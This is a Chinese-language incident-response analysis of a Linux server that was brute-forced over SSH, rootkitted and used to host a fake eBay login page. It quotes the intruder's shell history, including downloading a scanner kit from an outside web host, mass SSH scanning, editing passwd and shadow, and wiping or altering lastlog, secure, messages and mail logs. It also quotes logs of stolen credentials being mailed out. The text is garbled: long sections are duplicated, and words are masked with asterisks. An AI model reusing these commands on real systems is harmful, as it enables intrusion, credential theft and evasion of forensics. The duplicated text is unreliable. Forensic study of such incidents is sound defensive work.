網絡釣魚在我處理的過程中,遇見過4次,而每次的***手法和工具都幾乎一摸一樣,可以想象這是一個高度合作的***團伙。
接到客戶應急電話,迅速趕到IDC機房,以下是分析過程。
1. ***過程如下:
通過系統服務漏洞***成功――登陸系統――安裝配置httpd――下載ebay僞造網絡釣魚頁面文件――成功獲取用戶帳號和密碼,並用sendmail發送到***者郵箱。
2. 結果分析
基本過程:
暴力破解ssh成功――登陸系統――安裝配置rootkit和backdoor――下載ebay僞造網絡釣魚頁面文件――成功獲取用戶帳號和密碼,並用sendmail發送到***者郵箱――掃瞄其它機器端口和猜測其它機器密碼。
此機器10月29日被***,根據手法和目的,應該是一個***組所爲,以前已經發現過類似事件,此機被安裝rootkit和後門,不可信任了,建議備份數據後,重新安裝系統.
***時間段:
10月29日09:21:33成功破解
10月29日09:24登陸系統
11月5日 安裝rootkit和backdoor 掃描軟件
Rootkit替換了ps ls top netstat
Backdoor /usr/bin/ smbd –D
掃描軟件/.scan /var/tmp /var/tmp/.mr004 /usr/lib/.cgi-bin,
11月5日 17:30:41 開始***其他機器,掃瞄其它機器端口和猜測其它機器密碼
2.1 系統檢查可疑文件
留下backdoor和rootkit和多個***工具
/usr/lib/.cgi-bin,***工具
/var/tmp/.mr004***工具
/.scan ***工具
/home/home***工具
/home/m.log ip記錄
games /usr/games***工具
/var/tmp ***工具
/tmp/screens***工具
/usr/bin/ smbd -D目錄下,後門進程,不能用ps查看,可用pstree和lsof看到
file /usr/bin/smbd\ -D
/usr/bin/smbd -D: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, dynamically linked (uses shared libs), not stripped
通過系統服務漏洞***成功――登陸系統――安裝配置httpd――下載ebay僞造網絡釣魚頁面文件――成功獲取用戶帳號和密碼,並用sendmail發送到***者郵箱。
2. 結果分析
基本過程:
暴力破解ssh成功――登陸系統――安裝配置rootkit和backdoor――下載ebay僞造網絡釣魚頁面文件――成功獲取用戶帳號和密碼,並用sendmail發送到***者郵箱――掃瞄其它機器端口和猜測其它機器密碼。
此機器10月29日被***,根據手法和目的,應該是一個***組所爲,以前已經發現過類似事件,此機被安裝rootkit和後門,不可信任了,建議備份數據後,重新安裝系統.
***時間段:
10月29日09:21:33成功破解
10月29日09:24登陸系統
11月5日 安裝rootkit和backdoor 掃描軟件
Rootkit替換了ps ls top netstat
Backdoor /usr/bin/ smbd –D
掃描軟件/.scan /var/tmp /var/tmp/.mr004 /usr/lib/.cgi-bin,
11月5日 17:30:41 開始***其他機器,掃瞄其它機器端口和猜測其它機器密碼
2.1 系統檢查可疑文件
留下backdoor和rootkit和多個***工具
/usr/lib/.cgi-bin,***工具
/var/tmp/.mr004***工具
/.scan ***工具
/home/home***工具
/home/m.log ip記錄
games /usr/games***工具
/var/tmp ***工具
/tmp/screens***工具
/usr/bin/ smbd -D目錄下,後門進程,不能用ps查看,可用pstree和lsof看到
file /usr/bin/smbd\ -D
/usr/bin/smbd -D: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, dynamically linked (uses shared libs), not stripped
用ps –ef看不到系統真實信息,進程被篡改
2.2 日誌分析
爲了顯示效果,紅色標記的爲分析,其他爲原始記錄
~/.bash_history
此目錄爲以前建立,但history已經被刪除部分
cd /usr/lib/.cgi-bin/
ls
cd .mr
cd /usr/games
建立目錄
mkdir .cgi
cd .cgi/
ls
下載掃描器
wget www.tomis3.us/Hacks/scan.tgz
ftp
ftp 68.142.234.89
解壓並刪除原文件
tar zxzvf scan.tgz ;rm -rf scan.tgz \
tar zxzvf scan.tgz ;rm -rf scan.tgz
cd .mr004/
ls
rm -rf pass_file
cd ..
mv pass_file .mr004/
cd .mr004/
ls
screen已經被刪除,惡意軟件
screen
cat vuln.txt
rm -rf vuln.txt
cd /var/tmp/.mr004/
cat vuln.txt
ls -la
screen -r
screen -r 4583.pts-0.Linuxbackup
screen -wipe
screen
exit
socklist
w
screen -r
history
cd .scan
ls
cd /var/tmp
cd .mr004
ls
殺死screen進程
killall -9 screen
killall -9 SCREEN
掃描,分析了x內容是根據129爲參數$1,表示從129開始的地址依次掃描端口爲22的目標機器
./x 129
Ls
查看掃描結果
cat vuln.txt
screen –r
繼續掃207開始的地址
./x 207
pwd
cd /var/tmp/.mr004
killall -9 screen
service ssh restart
service sshd restart
service sshd reload
history
locate bios.txt
cd /home/.scan/.mr004/
ls -a
ps ax
screen -r 5180
screen -wipe
ls -a
rm -rf .mr004 .ssh-scan.swp mfu.txt bios.txt
ls -a
pico pass_file
nano pass_file
rm -rf pass_file
nano pass_file
screen
cd /usr/lib/.cgi-bin/
ls
w
sense /usr/lib/libice
cd .mr
ls
cd /usr/games/
cd .cgi/
ls
cd .mr004/
ls
cat vul
cat mfu.txt
ps –aux
查找掃描結果,傻了吧
locate mfu.txt
cd /home/.scan/.mr004/
ls
cat mfu.txt
ls
做賊心虛,經常看是否有人在線否
w
cd /usr/lib/.cgi-bin/
ls
cd .c
ls
cd .mr004/
ls
cat vuln.txt
ls
還看,唉
w
ls
有完沒完
w
刪除mail日誌,毒
rm -rf /var/spool/mail/root
ls
cd ..
ls
膽小的***
w
rm -rf .mr004/
下載***工具,開始已經下了,估計又找不到了,重下
wget www.tomis3.us/Hacks/scan.tgz
ftp
rm -rf .mr
tar zxzvf scan.tgz ;rm -rf scan.tgz
cd .mr004/
l
cd .mr004
ls
掃描210段的ssh
./x 210
W
掃描194段的ssh
爲了顯示效果,紅色標記的爲分析,其他爲原始記錄
~/.bash_history
此目錄爲以前建立,但history已經被刪除部分
cd /usr/lib/.cgi-bin/
ls
cd .mr
cd /usr/games
建立目錄
mkdir .cgi
cd .cgi/
ls
下載掃描器
wget www.tomis3.us/Hacks/scan.tgz
ftp
ftp 68.142.234.89
解壓並刪除原文件
tar zxzvf scan.tgz ;rm -rf scan.tgz \
tar zxzvf scan.tgz ;rm -rf scan.tgz
cd .mr004/
ls
rm -rf pass_file
cd ..
mv pass_file .mr004/
cd .mr004/
ls
screen已經被刪除,惡意軟件
screen
cat vuln.txt
rm -rf vuln.txt
cd /var/tmp/.mr004/
cat vuln.txt
ls -la
screen -r
screen -r 4583.pts-0.Linuxbackup
screen -wipe
screen
exit
socklist
w
screen -r
history
cd .scan
ls
cd /var/tmp
cd .mr004
ls
殺死screen進程
killall -9 screen
killall -9 SCREEN
掃描,分析了x內容是根據129爲參數$1,表示從129開始的地址依次掃描端口爲22的目標機器
./x 129
Ls
查看掃描結果
cat vuln.txt
screen –r
繼續掃207開始的地址
./x 207
pwd
cd /var/tmp/.mr004
killall -9 screen
service ssh restart
service sshd restart
service sshd reload
history
locate bios.txt
cd /home/.scan/.mr004/
ls -a
ps ax
screen -r 5180
screen -wipe
ls -a
rm -rf .mr004 .ssh-scan.swp mfu.txt bios.txt
ls -a
pico pass_file
nano pass_file
rm -rf pass_file
nano pass_file
screen
cd /usr/lib/.cgi-bin/
ls
w
sense /usr/lib/libice
cd .mr
ls
cd /usr/games/
cd .cgi/
ls
cd .mr004/
ls
cat vul
cat mfu.txt
ps –aux
查找掃描結果,傻了吧
locate mfu.txt
cd /home/.scan/.mr004/
ls
cat mfu.txt
ls
做賊心虛,經常看是否有人在線否
w
cd /usr/lib/.cgi-bin/
ls
cd .c
ls
cd .mr004/
ls
cat vuln.txt
ls
還看,唉
w
ls
有完沒完
w
刪除mail日誌,毒
rm -rf /var/spool/mail/root
ls
cd ..
ls
膽小的***
w
rm -rf .mr004/
下載***工具,開始已經下了,估計又找不到了,重下
wget www.tomis3.us/Hacks/scan.tgz
ftp
rm -rf .mr
tar zxzvf scan.tgz ;rm -rf scan.tgz
cd .mr004/
l
cd .mr004
ls
掃描210段的ssh
./x 210
W
掃描194段的ssh
./x 194
ls
rm -rf mfu.txt
rm -rf bios.txt
掃描205段的ssh
ls
rm -rf mfu.txt
rm -rf bios.txt
掃描205段的ssh
./x 205
w
history
cd /home/.scan/.mr004/
ls
screen
screen -r
w
查看進程
ps aux
然後重啓
reboot
cd /usr/games/
cd .mr
ls
cd .cgi
cd .mr004/
cat vul
ls
ps -aux
cd /home/.scan/
ls
cd .mr004/
ls
查看自己的痕跡
history
killall -9 screen
cd /usr/games/.cgi
ls
cd .mr004/
ls
cat pass_file
screen
繼續掃61段
./x 61
w
ps aux
cd .scan
ls -a
cd .ssh
ls
cd ..
cd /tmp
ls -a
cd screens
ls
cd S-root
ls
cd ..
ls
history
cd /home/.scan/.mr004/
ls
./x 71
cd /etc
ls
pwd
修改了口令檔案
vi passwd
vi shadow
看磁盤空間
df –k
下面大量查看進程和端口行爲
ps -ef
ps -ef
more /etc/shadow
sync
sync
sync
reboot
ps -ef
last -2-
last -20
ps -ef
which ps
ls -l /bin/ps
top
ls
lsof -a
lsof
lsof |more
lsof |more
ls
lsof |more
1586 daemon mem REG 8,1 1563240 160325 /lib/tls/libc-2.3.2.so
ls
lsof -l | more
lsof -l | more
cd /dev/initctl
env
LANG=C
export
lsof -l | more
cd /dev
cd initctl
ls -ln initctl
more initctl
netstat -an
netstat -an
ps -ef
last
lsof
lsof -l | more
migration
ps -ef
lsof -l | more
cd /
./migration
ls -a
find / -name migration
netstat -an
netstat -an | more
netstat -an | more
lsof -l | more
ls
lsof
看登錄日誌
last
reboot
last
date
cd /var
ls
cd log
ls
ls -ln lastlog
date
修改lastlog權限並刪除部分內容
chmod 777 lastlog
ls -ln
ls -ln lastlog
more lastlog
!
ls
vi lastlog
cd /etc
ls
vi hosts.allow
ls
last
su – goldensai
last
last
修改了這個,已經不可信了
vi hosts.allow
ls
ls
last
netstat -an
ps -ef
cd /etc
vi hosts.allow
ls
ls
ls
lsof | more
lsof
last
cd /var/log
ls
more messages
ls
查看日誌
tail messages
ls
last
cd /etc
查看允許登錄ip列表的文件
more hosts.allow
last
cd /var
;s
ls
cd log
ls
tail messages
ls
ls -ln
more xferlog
cd /home/home
ls
ls -ln
ls -l
pw
pwd
cd ..
ls
pwd
cd ..
ls
cd home
ls
cd home
ls
解壓rootkit文件
tar -xvf rk.tar
ls -ln
cd red
ls
cd crontabs
LANG=C
export LANG
LS
Ls
查看計劃任務
more crontabs
ls
ls -l
pwd
cd ..
ls
這個***水平不咋樣,碰到zip文件就傻了,不會解壓了
tar mail.zip
tar -xvf mail.zip
ls
重於解壓了
unzip mail.zip
ls
ls
ls
ls -ln
ls -ln
pwd
pwd
pwd
cd ..
ls
ls
cd /v
ar
ls
cd log
ls’
ls
tail xferlog
tail -50 xferlog
ls
tail messages
tail -50 messages
ls
cd /home/home
ls
ls -ln
ps -ef | more
uname -a
lsof | more
last | more
cd /var
ls
cd log
ls
ls -l
ls -l messages*
唉,肯定刪除了內容,重要的被抹去了
vi messages.1
tail messages.1
ls
vi messages
netstat -na | more
lsof -i : 23
lsof -i :23
lsof -i :111
more /etc/hosts.allow
more /etc/hosts.deny
vi /etc/hosts.deny
ps -ef | more
到收尾階段了,不停查看日誌和進程信息
lsof | more
netstat -na | more
lsof -i :1011
last | more
last | more
cd /var
ls
cd log
ls
more lastlog
ls
more secure
ls
修改了secure和messages日誌
vi secure
ls
vi messages
lsof | more
ps -ef | grep vsftpd
find / -name vsftpd
ls -l /usr/sbin/vsftpd
man vsftpd
lsof -i :21
ps -ef | grep smbd
man smbd
ps -ef | grep cupsd
ps -ef
ps
man ps
ps -e
ps -A
ps -er
ps -A
ps -d
ps -e
lsof | more
cd /etc
ls
ls rc*.d
cd rc2.d
ls
clear
ls -l S*
clear
ls S*
ls
cd ..
ls
cd xinetd.conf
more xinetd.conf
ls
cd xinetd.d
ls
ls -l
more krb5-telnet
ls
cd ..
cd rc0.d
ls S*
cd ..
cd rc1.d
ls S*
ls -l
clear
ls -l S*
cd ..
cd rc2.d
ls -l S*
cd ..
ls
cd rc3.d
ls -l S*
cd ..
ls
cd rc4.d
ls -l S*
cd ..
man find
查找所有指定時間內修改了的文件
find rc*.d -c -30
man find
find rc*.d -ctime -15
find rc*.d -ctime -30
find / -ctime -15
clear
ls
cd /home
ls
find /usr -ctime -15 > m.log
more m.log
ls -l /usr/bin/socklist
ls -l /usr/games/.cgi/.mr004/x
ls -ld /usr/games
ls -ld /usr/lib/.cgi-bin
man socklist
ls -l /usr/include/iceseed.h
more /usr/include/iceseed.h
more m.log
ls -l /usr/include/icepid.h
more /usr/include/icepid.h
ls -ld /usr/games
cd /usr/games/.cgi
ls
ls -a
cd .mr004
ls
more gen-pass.sh
ls
more pass_file
ls
ls -l psscan2
ls -l ssh-scan
more ssh-scan
ps -ef | grep ssh-scan
pwd
ls
ls SS
ls X
ls a
more a
ls
more bios.txt
ls
w
history
cd /home/.scan/.mr004/
ls
screen
screen -r
w
查看進程
ps aux
然後重啓
reboot
cd /usr/games/
cd .mr
ls
cd .cgi
cd .mr004/
cat vul
ls
ps -aux
cd /home/.scan/
ls
cd .mr004/
ls
查看自己的痕跡
history
killall -9 screen
cd /usr/games/.cgi
ls
cd .mr004/
ls
cat pass_file
screen
繼續掃61段
./x 61
w
ps aux
cd .scan
ls -a
cd .ssh
ls
cd ..
cd /tmp
ls -a
cd screens
ls
cd S-root
ls
cd ..
ls
history
cd /home/.scan/.mr004/
ls
./x 71
cd /etc
ls
pwd
修改了口令檔案
vi passwd
vi shadow
看磁盤空間
df –k
下面大量查看進程和端口行爲
ps -ef
ps -ef
more /etc/shadow
sync
sync
sync
reboot
ps -ef
last -2-
last -20
ps -ef
which ps
ls -l /bin/ps
top
ls
lsof -a
lsof
lsof |more
lsof |more
ls
lsof |more
1586 daemon mem REG 8,1 1563240 160325 /lib/tls/libc-2.3.2.so
ls
lsof -l | more
lsof -l | more
cd /dev/initctl
env
LANG=C
export
lsof -l | more
cd /dev
cd initctl
ls -ln initctl
more initctl
netstat -an
netstat -an
ps -ef
last
lsof
lsof -l | more
migration
ps -ef
lsof -l | more
cd /
./migration
ls -a
find / -name migration
netstat -an
netstat -an | more
netstat -an | more
lsof -l | more
ls
lsof
看登錄日誌
last
reboot
last
date
cd /var
ls
cd log
ls
ls -ln lastlog
date
修改lastlog權限並刪除部分內容
chmod 777 lastlog
ls -ln
ls -ln lastlog
more lastlog
!
ls
vi lastlog
cd /etc
ls
vi hosts.allow
ls
last
su – goldensai
last
last
修改了這個,已經不可信了
vi hosts.allow
ls
ls
last
netstat -an
ps -ef
cd /etc
vi hosts.allow
ls
ls
ls
lsof | more
lsof
last
cd /var/log
ls
more messages
ls
查看日誌
tail messages
ls
last
cd /etc
查看允許登錄ip列表的文件
more hosts.allow
last
cd /var
;s
ls
cd log
ls
tail messages
ls
ls -ln
more xferlog
cd /home/home
ls
ls -ln
ls -l
pw
pwd
cd ..
ls
pwd
cd ..
ls
cd home
ls
cd home
ls
解壓rootkit文件
tar -xvf rk.tar
ls -ln
cd red
ls
cd crontabs
LANG=C
export LANG
LS
Ls
查看計劃任務
more crontabs
ls
ls -l
pwd
cd ..
ls
這個***水平不咋樣,碰到zip文件就傻了,不會解壓了
tar mail.zip
tar -xvf mail.zip
ls
重於解壓了
unzip mail.zip
ls
ls
ls
ls -ln
ls -ln
pwd
pwd
pwd
cd ..
ls
ls
cd /v
ar
ls
cd log
ls’
ls
tail xferlog
tail -50 xferlog
ls
tail messages
tail -50 messages
ls
cd /home/home
ls
ls -ln
ps -ef | more
uname -a
lsof | more
last | more
cd /var
ls
cd log
ls
ls -l
ls -l messages*
唉,肯定刪除了內容,重要的被抹去了
vi messages.1
tail messages.1
ls
vi messages
netstat -na | more
lsof -i : 23
lsof -i :23
lsof -i :111
more /etc/hosts.allow
more /etc/hosts.deny
vi /etc/hosts.deny
ps -ef | more
到收尾階段了,不停查看日誌和進程信息
lsof | more
netstat -na | more
lsof -i :1011
last | more
last | more
cd /var
ls
cd log
ls
more lastlog
ls
more secure
ls
修改了secure和messages日誌
vi secure
ls
vi messages
lsof | more
ps -ef | grep vsftpd
find / -name vsftpd
ls -l /usr/sbin/vsftpd
man vsftpd
lsof -i :21
ps -ef | grep smbd
man smbd
ps -ef | grep cupsd
ps -ef
ps
man ps
ps -e
ps -A
ps -er
ps -A
ps -d
ps -e
lsof | more
cd /etc
ls
ls rc*.d
cd rc2.d
ls
clear
ls -l S*
clear
ls S*
ls
cd ..
ls
cd xinetd.conf
more xinetd.conf
ls
cd xinetd.d
ls
ls -l
more krb5-telnet
ls
cd ..
cd rc0.d
ls S*
cd ..
cd rc1.d
ls S*
ls -l
clear
ls -l S*
cd ..
cd rc2.d
ls -l S*
cd ..
ls
cd rc3.d
ls -l S*
cd ..
ls
cd rc4.d
ls -l S*
cd ..
man find
查找所有指定時間內修改了的文件
find rc*.d -c -30
man find
find rc*.d -ctime -15
find rc*.d -ctime -30
find / -ctime -15
clear
ls
cd /home
ls
find /usr -ctime -15 > m.log
more m.log
ls -l /usr/bin/socklist
ls -l /usr/games/.cgi/.mr004/x
ls -ld /usr/games
ls -ld /usr/lib/.cgi-bin
man socklist
ls -l /usr/include/iceseed.h
more /usr/include/iceseed.h
more m.log
ls -l /usr/include/icepid.h
more /usr/include/icepid.h
ls -ld /usr/games
cd /usr/games/.cgi
ls
ls -a
cd .mr004
ls
more gen-pass.sh
ls
more pass_file
ls
ls -l psscan2
ls -l ssh-scan
more ssh-scan
ps -ef | grep ssh-scan
pwd
ls
ls SS
ls X
ls a
more a
ls
more bios.txt
ls
Secure.2和message.4
中的日誌中有大量遠程暴力破解ssh telnet用戶和口令的記載,ip來自不同的地方
Oct 24 00:50:14 Linuxbackup sshd[1691]: Failed password for illegal user toor from 219.254.35.71 port 33558 ssh2
中的日誌中有大量遠程暴力破解ssh telnet用戶和口令的記載,ip來自不同的地方
Oct 24 00:50:14 Linuxbackup sshd[1691]: Failed password for illegal user toor from 219.254.35.71 port 33558 ssh2
Oct 24 00:50:18 Linuxbackup sshd[1693]: Illegal user user from 219.254.35.71
Oct 24 00:50:20 Linuxbackup sshd[1693]: Failed password for illegal user user from 219.254.35.71 port 34522 ssh2
Oct 24 00:50:22 Linuxbackup sshd[1695]: Illegal user user from 219.254.35.71
Oct 29 13:56:22 Linuxbackup xinetd[1462]: START: telnet pid=1863 from=219.130.167.11
Oct 24 00:50:20 Linuxbackup sshd[1693]: Failed password for illegal user user from 219.254.35.71 port 34522 ssh2
Oct 24 00:50:22 Linuxbackup sshd[1695]: Illegal user user from 219.254.35.71
Oct 29 13:56:22 Linuxbackup xinetd[1462]: START: telnet pid=1863 from=219.130.167.11
Messages.2
錯誤日誌,發送錯誤的ICMP類型爲11,並通過網卡eth0廣播出去
Oct 23 04:06:43 Linuxbackup kernel: 61.144.56.34 sent an invalid ICMP type 11, code 1 error to a broadcast: 0.0.0.0 on eth0
錯誤日誌,發送錯誤的ICMP類型爲11,並通過網卡eth0廣播出去
Oct 23 04:06:43 Linuxbackup kernel: 61.144.56.34 sent an invalid ICMP type 11, code 1 error to a broadcast: 0.0.0.0 on eth0
10月23日來自美國的ip成功通過後門連接進來
Oct 23 16:51:52 Linuxbackup smbd -D[31033]: log: Connection from 85.186.209.59 port 1172
這析地址也都成功登錄本機器
IP : 61.129.78.101
地址: 上海市浦東新區 ADSL
IP : 218.5.5.3
地址: 福建省福州市 福建政法管理幹部學院
IP : 205.234.137.241
地址: 美國/加拿大 CZ88.NET
Access.log.2
有如下可疑訪問,證明訪問者訪問了假的ebay登錄頁面,***製造假的Investigation頁面和校驗賬號頁面在/var/www/html/.eBay下,讓ebay用戶登錄,從而獲取賬戶信息
212.93.137.44 – - [28/Oct/2005:04:12:21 +0800] "GET /icons/unknown.gif HTTP/1.0" 200 245 "http://61.144.56.34/.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.93.137.44 – - [28/Oct/2005:04:28:51 +0800] "GET /.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/eBay_com%20Verify%20your%20eBay%20account_files/cobrand_determine.js HTTP/1.0" 304 – "http://61.144.56.34/.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/eBay_com%20Verify%20your%20eBay%20account.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Oct 23 16:51:52 Linuxbackup smbd -D[31033]: log: Connection from 85.186.209.59 port 1172
這析地址也都成功登錄本機器
IP : 61.129.78.101
地址: 上海市浦東新區 ADSL
IP : 218.5.5.3
地址: 福建省福州市 福建政法管理幹部學院
IP : 205.234.137.241
地址: 美國/加拿大 CZ88.NET
Access.log.2
有如下可疑訪問,證明訪問者訪問了假的ebay登錄頁面,***製造假的Investigation頁面和校驗賬號頁面在/var/www/html/.eBay下,讓ebay用戶登錄,從而獲取賬戶信息
212.93.137.44 – - [28/Oct/2005:04:12:21 +0800] "GET /icons/unknown.gif HTTP/1.0" 200 245 "http://61.144.56.34/.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.93.137.44 – - [28/Oct/2005:04:28:51 +0800] "GET /.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/eBay_com%20Verify%20your%20eBay%20account_files/cobrand_determine.js HTTP/1.0" 304 – "http://61.144.56.34/.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/eBay_com%20Verify%20your%20eBay%20account.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Maillog.2
被誘騙到的口令文件通過sendmail發送到 [email protected] [email protected] [email protected] [email protected] [email protected]多個郵箱地址
被誘騙到的口令文件通過sendmail發送到 [email protected] [email protected] [email protected] [email protected] [email protected]多個郵箱地址
Oct 28 04:14:59 Linuxbackup sendmail[29986]: j9RKExXt029986: to=antrax<[email protected]>, delay=00:00:00, mailer=esmtp, pri=30117, dsn=4.4.3, stat=queued
Oct 28 04:17:03 Linuxbackup sendmail[29988]: j9RKH3Sd029988: to=antrax<[email protected]>, delay=00:00:00, mailer=esmtp, pri=30326, dsn=4.4.3, stat=queued
Oct 29 13:05:50 Linuxbackup sendmail[1856]: j9T55oLr001856: from=root, size=1960, class=0, nrcpts=1, msgid=<[email protected]>, relay=root@localhost
Oct 29 13:05:50 Linuxbackup sendmail[1856]: j9T55oLr001856: [email protected], delay=00:00:00, mailer=esmtp, pri=31960, dsn=4.4.3, stat=queued
Oct 17 23:03:09 Linuxbackup sendmail[12283]: j9HF398d012283: [email protected], delay=00:00:00, mailer=esmtp, pri=31525, dsn=4.4.3, stat=queued
Oct 19 06:20:47 Linuxbackup sendmail[31147]: j9IMKlTN031147: from=root, size=3346, class=0, nrcpts=1, msgid=<[email protected]>, relay=root@localhost
Oct 19 06:20:47 Linuxbackup sendmail[31147]: j9IMKlTN031147: [email protected], delay=00:00:00, mailer=esmtp, pri=33346, dsn=4.4.3, stat=queued
Oct 28 04:17:03 Linuxbackup sendmail[29988]: j9RKH3Sd029988: to=antrax<[email protected]>, delay=00:00:00, mailer=esmtp, pri=30326, dsn=4.4.3, stat=queued
Oct 29 13:05:50 Linuxbackup sendmail[1856]: j9T55oLr001856: from=root, size=1960, class=0, nrcpts=1, msgid=<[email protected]>, relay=root@localhost
Oct 29 13:05:50 Linuxbackup sendmail[1856]: j9T55oLr001856: [email protected], delay=00:00:00, mailer=esmtp, pri=31960, dsn=4.4.3, stat=queued
Oct 17 23:03:09 Linuxbackup sendmail[12283]: j9HF398d012283: [email protected], delay=00:00:00, mailer=esmtp, pri=31525, dsn=4.4.3, stat=queued
Oct 19 06:20:47 Linuxbackup sendmail[31147]: j9IMKlTN031147: from=root, size=3346, class=0, nrcpts=1, msgid=<[email protected]>, relay=root@localhost
Oct 19 06:20:47 Linuxbackup sendmail[31147]: j9IMKlTN031147: [email protected], delay=00:00:00, mailer=esmtp, pri=33346, dsn=4.4.3, stat=queued
網絡釣魚***的一些特點:
1 大規模掃描有漏洞的主機
2 批掃描工具
3 攻陷有漏洞的主機
4 個人PC主機
5 架設釣魚網站
6 前臺假冒網站:知名的金融機構、在線電子商務網站
7 後臺腳本:收集、驗證用戶輸入,並通過某種渠道轉發給釣魚者
它的***目標只有一個:獲取個人敏感信息(信用卡帳號密碼等)
1 大規模掃描有漏洞的主機
2 批掃描工具
3 攻陷有漏洞的主機
4 個人PC主機
5 架設釣魚網站
6 前臺假冒網站:知名的金融機構、在線電子商務網站
7 後臺腳本:收集、驗證用戶輸入,並通過某種渠道轉發給釣魚者
它的***目標只有一個:獲取個人敏感信息(信用卡帳號密碼等)
僞裝架設知名金融機構及商務網站進行欺騙用戶
並且會發送大量欺騙性垃圾郵件到各個用戶
所以現在的***已經從原來單純的技術研究和破壞轉入到經濟利益爲目的的***了,而且加強了***的合作化和批量自動化。
並且會發送大量欺騙性垃圾郵件到各個用戶
所以現在的***已經從原來單純的技術研究和破壞轉入到經濟利益爲目的的***了,而且加強了***的合作化和批量自動化。